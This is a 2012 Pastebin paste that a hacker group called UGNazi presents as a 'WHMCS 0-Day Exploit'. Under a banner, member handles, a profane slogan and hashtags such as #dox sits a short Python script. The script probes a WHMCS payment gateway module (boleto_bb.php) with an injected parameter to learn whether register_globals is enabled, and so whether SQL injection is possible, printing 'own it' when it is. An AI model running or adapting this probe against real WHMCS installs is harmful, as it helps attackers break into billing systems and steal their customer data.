Advertisement
lehieuit

WHMCS 0-Day Exploit

Jun 17th, 2012
853
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.48 KB | None | 0 0
  1. __ __ _______ ____ __ __
  2. | | | |/ _____| \ | | ______ _______(__)
  3. | | | | / __| \| |/ __ |___ __| |
  4. | |__| | |___\ \ |\ | (__| |___/ /_| |
  5. \________/\_______/__| \___|\____/_|_______|__|
  6. ============================|Twitter.com/UG|=======================
  7.  
  8. ---> Joshthegod > MrOsama > Cosmo > CyberZeist <---
  9.  
  10.  
  11. "Fuck With The Best , Die Like The Rest"
  12.  
  13. Twitter.com/Ug
  14. Twitter.com/Joshthegod
  15. Twitter.com/Cosmothegod
  16. Twitter.com/le4ky
  17.  
  18. ==============================================================================
  19.  
  20. #UGNazi #Mybb #UGNaziwhmcs #Whmcs #fuckskids #hack #joshthegod #UG #Cosmothegod #MrOsama #dox
  21.  
  22. ==============================================================================
  23.  
  24. ########################################
  25. # UGNazi 0 Day WHMCS Exploit
  26. #######################################
  27. import urllib2
  28. import urllib
  29. import os
  30.  
  31. def regglobcheck():
  32. regglob1 = urllib2.Request('http://127.0.0.1/whmcs/whmcs_v451/whmcs/modules/gateways/boleto/boleto_bb.php?dadosboleto[identificacao]=test')
  33. regglob2 = urllib2.urlopen(regglob1)
  34. regglob3 = regglob2.read().count('test')
  35. if regglob3 == 0:
  36. rgen = 0
  37. print " [+] Register Globals not enabled, no sqli on this whmcs install"
  38. elif regglob3 >= 1:
  39. rgen = 1
  40. print " [+] Register Globals enabled, own it."
  41.  
  42. regglobcheck()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement